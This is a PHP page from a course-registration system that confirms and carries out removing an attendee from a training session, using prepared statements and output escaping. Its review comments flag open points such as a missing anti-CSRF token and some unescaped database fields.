<?php
	include_once("config.php"); //holds global config variables
	include_once("common_functions.php"); //include some common functions
	require_once($_SERVER['DOCUMENT_ROOT'] . "/phplist/config/config.php"); //phplist config values                
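 	// Access gate, defined outside this file (presumably in common_functions.php).
	// NOTE(review): it is called with 'admin', yet the page below also renders a
	// non-admin branch - confirm which users are meant to get past this call.
	check_if_authenticated('admin');//check if user is logged in

	// Connection settings come from the included config files.
	$db = mysqli_connect($mysql_server, $user, $pass, $database);
	if(!$db){
		// Fail closed: keep the driver's error text in the server log only, so
		// connection details are never shown to the browser.
		error_log('remove_attendee: database connection failed: ' . mysqli_connect_error());
		http_response_code(500);
		exit('The service is temporarily unavailable.');
	}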

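	// "No" was pressed on the confirmation form: go back without removing anyone.
	if(isset($_POST['cancel']) && ($_POST['cancel'] === "No")){
		if(is_admin_logged_in()){
			// session_id is supplied by the browser and may be missing or an array.
			// Take it only when it is a string and URL-encode it, so it cannot add
			// extra query parameters or break the Location header.
			$cancel_session_id = (isset($_POST['session_id']) && is_string($_POST['session_id'])) ? $_POST['session_id'] : '';
			header("location:list_attendees.php?session_id=" . urlencode($cancel_session_id));
			exit;
		}else{
			header("location:/course_registration/user_course_list.php");
			exit;
		}
	}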
	
	// Emit the top of the page: the public layout for ordinary users, the CES
	// admin layout (plus the admin navigation) when an admin is logged in.
	if(!is_admin_logged_in()){
		$page_title = "Unregister";
		include("public_top.php"); // opening HTML of the public pages
		echo "<article>
        		<h2>Unregister From Session</h2>";
	}
	else{
		$page_title = "Remove Attendee | CES Admin";
		include_once("admin_html_top.php"); // opening HTML shared by the CES admin pages
		echo "<article class='ces-admin'>
        		<h2>CES Admin - Remove Attendee</h2>";
        include_once("ces_admin_nav.php");
	}

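	if(isset($_POST['remove_attendee'])){
		// Every posted field comes from the browser, including the hidden ones this
		// page wrote itself. Accept only strings, and default missing fields to ''.
		$posted_session_id  = (isset($_POST['session_id']) && is_string($_POST['session_id'])) ? $_POST['session_id'] : '';
		$posted_id          = (isset($_POST['id']) && is_string($_POST['id'])) ? $_POST['id'] : '';
		$posted_location_id = (isset($_POST['location_id']) && is_string($_POST['location_id'])) ? $_POST['location_id'] : '';
		$posted_first_name  = (isset($_POST['first_name']) && is_string($_POST['first_name'])) ? $_POST['first_name'] : '';
		$posted_last_name   = (isset($_POST['last_name']) && is_string($_POST['last_name'])) ? $_POST['last_name'] : '';

		// NOTE(review): remove_attendee() is defined outside this file. For the
		// non-admin branch, confirm that it checks the posted id against the
		// logged-in user, and that it binds these values rather than placing them
		// in SQL text. No anti-CSRF token is checked in this file - confirm one is
		// enforced elsewhere.
		if(remove_attendee($posted_session_id, $posted_id, $posted_location_id)){
			if(is_admin_logged_in()){
				// Names are HTML-escaped and ids URL-encoded before being echoed, so
				// posted values cannot inject markup or script into the page.
				echo "\n<p class='alert alert-success'>Success - " . htmlspecialchars($posted_first_name, ENT_QUOTES, 'UTF-8') . " " . htmlspecialchars($posted_last_name, ENT_QUOTES, 'UTF-8') . " has been removed from the session.</p>";
				echo "\n<a class='btn btn-lg ces-green-btn' href='list_attendees.php?session_id=" . urlencode($posted_session_id) . "'>Session Attendees List</a>";
				echo "\n<a class='btn btn-lg ces-orange-btn' href='user_admin_course_list.php?id=" . urlencode($posted_id) . "'>User's Course List</a>";
			}else{
				echo "\n<p class='alert alert-success'>Success - You have been removed from the session.</p>";
				echo "\n<a class='btn btn-lg ces-green-btn' href='/sessions/current/'>Current Sessions</a>";
				echo "\n<a class='btn btn-lg ces-blue-btn' href='user_course_list.php'>Your Courses</a>";
			}
		}else{
			// NOTE(review): $delete_sql is never assigned in this file, so unless
			// remove_attendee() exports it this passes null. Also confirm that
			// print_sql_error() does not show SQL text to end users, since that
			// would disclose schema details.
			print_sql_error('Error - could not remove attendee from the session when trying to do:', isset($delete_sql) ? $delete_sql : null);
		}//else
	}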
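	else { //if form has not been submitted yet ask user to confirm that they really want to remove attendee from session
		// Query-string values are controlled by whoever built the link. Accept only
		// strings, bind them as SQL parameters and HTML-escape them on output.
		$req_session_id  = (isset($_GET['session_id']) && is_string($_GET['session_id'])) ? $_GET['session_id'] : '';
		$req_id          = (isset($_GET['id']) && is_string($_GET['id'])) ? $_GET['id'] : '';
		$req_location_id = (isset($_GET['location_id']) && is_string($_GET['location_id'])) ? $_GET['location_id'] : '';
		$req_user_type   = (isset($_GET['user_type']) && is_string($_GET['user_type'])) ? $_GET['user_type'] : '';

		// PHP_SELF includes any path info the client appended, so it is escaped too.
		// NOTE(review): no anti-CSRF token is emitted with this form - confirm one is
		// added and verified elsewhere before the removal is carried out.
		echo "\n<form method='post' action='" . htmlspecialchars($_SERVER['PHP_SELF'], ENT_QUOTES, 'UTF-8') . "'>";
		echo "<input type='hidden' name='session_id' value='" . htmlspecialchars($req_session_id, ENT_QUOTES, 'UTF-8') . "'>"; //so we can keep track of the session_id
		echo "<input type='hidden' name='id' value='" . htmlspecialchars($req_id, ENT_QUOTES, 'UTF-8') . "'>"; //so we can keep track of the person
		echo "<input type='hidden' name='location_id' value='" . htmlspecialchars($req_location_id, ENT_QUOTES, 'UTF-8') . "'>"; //so we can keep track of the location

		//get some details about the attendee we are removing
		// Prepared statement: the id is sent as a bound parameter, never as SQL text.
		// mysqli_stmt_get_result() needs the mysqlnd driver.
		$attendee = array('', ''); // used when the user is not found or the query fails
		$attendee_stmt = mysqli_prepare($db, "SELECT first_name.value as first_name, last_name.value as last_name, user.email
		FROM phplist_user_user user
		LEFT OUTER JOIN phplist_user_user_attribute first_name ON user.id = first_name.userid AND first_name.attributeid = '1'
		LEFT OUTER JOIN phplist_user_user_attribute last_name ON user.id = last_name.userid AND last_name.attributeid = '2'
		WHERE user.id = ?");
		if($attendee_stmt && mysqli_stmt_bind_param($attendee_stmt, 's', $req_id) && mysqli_stmt_execute($attendee_stmt)){
			$attendee_result = mysqli_stmt_get_result($attendee_stmt);
			$attendee_row = $attendee_result ? mysqli_fetch_row($attendee_result) : null;
			if($attendee_row){
				$attendee = $attendee_row;
			}
		}

		// The names are stored user attributes; escape them once for every HTML use
		// below. The cast covers NULLs produced by the outer joins.
		$first_name_html = htmlspecialchars((string) $attendee[0], ENT_QUOTES, 'UTF-8');
		$last_name_html  = htmlspecialchars((string) $attendee[1], ENT_QUOTES, 'UTF-8');

		echo "<input type='hidden' name='first_name' value='" . $first_name_html . "'>"; //so we can use the person's first name once form is submitted
		echo "<input type='hidden' name='last_name' value='" . $last_name_html . "'>"; //so we can use the person's last name once form is submitted
		echo "<input type='hidden' name='user_type' value='" . htmlspecialchars($req_user_type, ENT_QUOTES, 'UTF-8') . "'>"; //so we can keep track of if a user or admin is logged in

		//get the course details so we can show which session the attendee will be removed from for confirmation
		// Placeholders are bound in order: location_id first, then session_id.
		$session_result = false;
		$session_stmt = mysqli_prepare($db, "SELECT session.session_id, course.course_id, course.course_name, course.course_description, unix_timestamp(session.start_dt) start_dt, unix_timestamp(session.end_dt) end_dt, location.location_name, location.address_line1, location.address_line2, location.city, location.province, location.postal_code, level.level_description
		FROM ces_sessions session
		LEFT OUTER JOIN ces_courses course ON session.course_id = course.course_id
		LEFT OUTER JOIN ces_locations location ON location.location_id = ?
		LEFT OUTER JOIN ces_levels level ON level.level_id = course.level_id
		WHERE session.session_id = ?");
		if($session_stmt && mysqli_stmt_bind_param($session_stmt, 'ss', $req_location_id, $req_session_id) && mysqli_stmt_execute($session_stmt)){
			$session_result = mysqli_stmt_get_result($session_stmt);
		}

		// If the lookup fails or finds no session, nothing below is printed - that
		// includes the Yes/No buttons.
		while ($session_result && ($session_query = mysqli_fetch_array($session_result))){
			if(is_admin_logged_in()){
				echo "<p class='ces-confrim-removal'>Are you sure you want to remove <strong>". $first_name_html . " " . $last_name_html ."</strong> from this session?</p>";
			}
			else{
				echo "<p class='ces-confrim-removal'><strong>". $first_name_html ."</strong>, are you sure you want to be removed from this session?</p>";
			}

			// NOTE(review): the course, level and location columns below are echoed as
			// stored. If they are not meant to carry HTML markup, escape them with
			// htmlspecialchars() as well.
	?>
			<dl class='ces-description-list'>
				<dt>Course:</dt>
				<dd><?php echo $session_query['course_name']; ?></dd>

			<dt>Date:</dt>
		<?php
			// unix_timestamp() values; cast so date() always receives an integer
			$start_ts = (int) $session_query['start_dt'];
			$end_ts = (int) $session_query['end_dt'];
			if (date('Ymd', $start_ts) == date('Ymd', $end_ts)){
				//starts and ends on the same day
				echo "<dd class='ces-registration-time'>". date('F j, Y g:i A', $start_ts). " to " . date('g:i A', $end_ts) . "</dd>";
			}
			else{
				echo "<dd class='ces-registration-time'>". date('F j, Y g:i A', $start_ts). " to " . date('F j, Y g:i A', $end_ts) . "</dd>";
			}
		?>

			<dt>Description:</dt>
			<dd><?php echo ($session_query['course_description']?$session_query['course_description']: 'None'); ?></dd>

			<dt>Level:</dt>
			<dd><?php echo ($session_query['level_description']? $session_query['level_description']: 'None'); ?></dd>
			<?php if(!is_session_online($session_query['session_id'])){?>
			<dt>Location:</dt>
			<dd>
				<?php 
					//2011-05-28 - wsopko - output session name as map link
					echo $session_query['location_name'];
					if (strlen($session_query['address_line1']) > 0)
						echo "\n<br>" . $session_query['address_line1'];
					if (strlen($session_query['address_line2']) > 0)
						echo "\n<br>" . $session_query['address_line2'];
					if (strlen($session_query['city']) > 0)
						echo "\n<br>" . $session_query['city'];
					if (strlen($session_query['province']) > 0)
						echo ", " . $session_query['province'];
					if (strlen($session_query['postal_code']) > 0)
						echo "\n<br>" . substr($session_query['postal_code'], 0, 3). " " . substr($session_query['postal_code'], 3, 3);
				?>
			</dd>
			<?php } ?>
			</dl>
	
	<div class="ces-remove-attendee-page-btns">
		<input class="btn btn-lg btn-block ces-green-btn" type='submit' name='remove_attendee' value="Yes">
		<input class="btn btn-lg btn-block ces-red-btn" type='submit' name='cancel' value="No">
	</div>	
	<?php 
		}//while	
	?>	
			</form>
	<?php 
	}//else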
	
	// Close the page with the footer that matches the layout opened above:
	// the admin footer for a logged-in admin, the public footer otherwise.
	include_once(is_admin_logged_in() ? "admin_html_bottom.php" : "public_bottom.php");
?>
	


